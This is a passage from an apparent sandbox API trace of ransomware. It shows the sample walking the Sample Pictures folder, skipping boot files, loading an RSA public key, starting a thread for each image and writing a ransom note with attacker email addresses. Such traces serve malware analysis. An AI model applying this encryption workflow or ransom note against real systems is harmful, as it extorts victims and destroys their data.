MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0143.932] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0143.933] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0143.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8a4 [0143.933] Sleep (dwMilliseconds=0x96) [0144.212] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0144.212] lstrcmpW (lpString1="Hydrangeas.jpg", lpString2="..") returned 1 [0144.212] lstrcmpW (lpString1="Hydrangeas.jpg", lpString2=".") returned 1 [0144.212] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0144.212] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch="ntldr") returned 0x0 [0144.212] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch="NTLDR") returned 0x0 [0144.212] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0144.212] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch="ntdetect.com") returned 0x0 [0144.212] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0144.212] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0144.212] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0144.212] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.212] lstrcpyW (in: lpString1=0x17be7c, lpString2="Hydrangeas.jpg" | out: lpString1="Hydrangeas.jpg") returned="Hydrangeas.jpg" [0144.212] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.212] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8d8 [0144.213] Sleep (dwMilliseconds=0x96) [0144.414] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0144.414] lstrcmpW (lpString1="Jellyfish.jpg", lpString2="..") returned 1 [0144.414] lstrcmpW (lpString1="Jellyfish.jpg", lpString2=".") returned 1 [0144.414] StrStrW (lpFirst="Jellyfish.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0144.414] StrStrW (lpFirst="Jellyfish.jpg", lpSrch="ntldr") returned 0x0 [0144.414] StrStrW (lpFirst="Jellyfish.jpg", lpSrch="NTLDR") returned 0x0 [0144.414] StrStrW (lpFirst="Jellyfish.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0144.414] StrStrW (lpFirst="Jellyfish.jpg", lpSrch="ntdetect.com") returned 0x0 [0144.414] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0144.414] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0144.414] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0144.414] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.414] lstrcpyW (in: lpString1=0x17be7c, lpString2="Jellyfish.jpg" | out: lpString1="Jellyfish.jpg") returned="Jellyfish.jpg" [0144.414] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8d0 [0144.414] Sleep (dwMilliseconds=0x96) [0144.602] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0144.602] lstrcmpW (lpString1="Koala.jpg", lpString2="..") returned 1 [0144.602] lstrcmpW (lpString1="Koala.jpg", lpString2=".") returned 1 [0144.602] StrStrW (lpFirst="Koala.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0144.603] StrStrW (lpFirst="Koala.jpg", lpSrch="ntldr") returned 0x0 [0144.603] StrStrW (lpFirst="Koala.jpg", lpSrch="NTLDR") returned 0x0 [0144.603] StrStrW (lpFirst="Koala.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0144.603] StrStrW (lpFirst="Koala.jpg", lpSrch="ntdetect.com") returned 0x0 [0144.603] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0144.603] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0144.603] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0144.603] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.603] lstrcpyW (in: lpString1=0x17be7c, lpString2="Koala.jpg" | out: lpString1="Koala.jpg") returned="Koala.jpg" [0144.603] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c4 [0144.603] Sleep (dwMilliseconds=0x96) [0144.790] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0144.790] lstrcmpW (lpString1="Lighthouse.jpg", lpString2="..") returned 1 [0144.790] lstrcmpW (lpString1="Lighthouse.jpg", lpString2=".") returned 1 [0144.790] StrStrW (lpFirst="Lighthouse.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0144.790] StrStrW (lpFirst="Lighthouse.jpg", lpSrch="ntldr") returned 0x0 [0144.790] StrStrW (lpFirst="Lighthouse.jpg", lpSrch="NTLDR") returned 0x0 [0144.790] StrStrW (lpFirst="Lighthouse.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0144.790] StrStrW (lpFirst="Lighthouse.jpg", lpSrch="ntdetect.com") returned 0x0 [0144.790] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0144.790] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0144.790] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0144.790] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.790] lstrcpyW (in: lpString1=0x17be7c, lpString2="Lighthouse.jpg" | out: lpString1="Lighthouse.jpg") returned="Lighthouse.jpg" [0144.791] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x884 [0144.791] Sleep (dwMilliseconds=0x96) [0145.023] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.023] lstrcmpW (lpString1="Penguins.jpg", lpString2="..") returned 1 [0145.023] lstrcmpW (lpString1="Penguins.jpg", lpString2=".") returned 1 [0145.023] StrStrW (lpFirst="Penguins.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0145.023] StrStrW (lpFirst="Penguins.jpg", lpSrch="ntldr") returned 0x0 [0145.023] StrStrW (lpFirst="Penguins.jpg", lpSrch="NTLDR") returned 0x0 [0145.023] StrStrW (lpFirst="Penguins.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0145.023] StrStrW (lpFirst="Penguins.jpg", lpSrch="ntdetect.com") returned 0x0 [0145.023] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0145.023] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0145.023] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0145.023] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.023] lstrcpyW (in: lpString1=0x17be7c, lpString2="Penguins.jpg" | out: lpString1="Penguins.jpg") returned="Penguins.jpg" [0145.023] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0145.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8d4 [0145.024] Sleep (dwMilliseconds=0x96) [0145.258] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.258] lstrcmpW (lpString1="Tulips.jpg", lpString2="..") returned 1 [0145.258] lstrcmpW (lpString1="Tulips.jpg", lpString2=".") returned 1 [0145.258] StrStrW (lpFirst="Tulips.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0145.258] StrStrW (lpFirst="Tulips.jpg", lpSrch="ntldr") returned 0x0 [0145.258] StrStrW (lpFirst="Tulips.jpg", lpSrch="NTLDR") returned 0x0 [0145.258] StrStrW (lpFirst="Tulips.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0145.258] StrStrW (lpFirst="Tulips.jpg", lpSrch="ntdetect.com") returned 0x0 [0145.258] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0145.258] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0145.258] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0145.258] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.258] lstrcpyW (in: lpString1=0x17be7c, lpString2="Tulips.jpg" | out: lpString1="Tulips.jpg") returned="Tulips.jpg" [0145.258] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0145.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x890 [0145.259] Sleep (dwMilliseconds=0x96) [0145.524] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0145.524] FindClose (in: hFindFile=0x3d11998 | out: hFindFile=0x3d11998) returned 1 [0145.527] FindClose (in: hFindFile=0x3d11998 | out: hFindFile=0x3d11998) returned 0 [0145.527] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0145.527] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*" [0145.527] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="Desktop") returned 0x0 [0145.527] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="DESKTOP") returned 0x0 [0145.527] SetErrorMode (uMode=0x1) returned 0x1 [0145.527] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\_HELP_INSTRUCTION.TXT") returned 62 [0145.527] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0145.528] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0145.528] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x894) returned 0x0 [0145.528] RegQueryValueExW (in: hKey=0x894, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4374368, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4374368*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0145.528] RegCloseKey (hKey=0x894) returned 0x0 [0145.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0145.528] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0145.528] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\pictures\\sample pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.528] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\pictures\\sample pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0145.529] WriteFile (in: hFile=0x894, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0145.529] CloseHandle (hObject=0x894) returned 1 [0145.530] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11998 [0145.530] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="Sample Pictures" [0145.530] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0145.530] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0145.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.530] FindNextFileW (in: hFindFile=0x3d11998, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0145.530] FindClose (in: hFindFile=0x3d11998 | out: hFindFile=0x3d11998) returned 1 [0145.530] FindClose (in: hFindFile=0x3d11998 | out: hFindFile=0x3d11998) returned 0 [0145.531] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0145.531] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0145.531] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 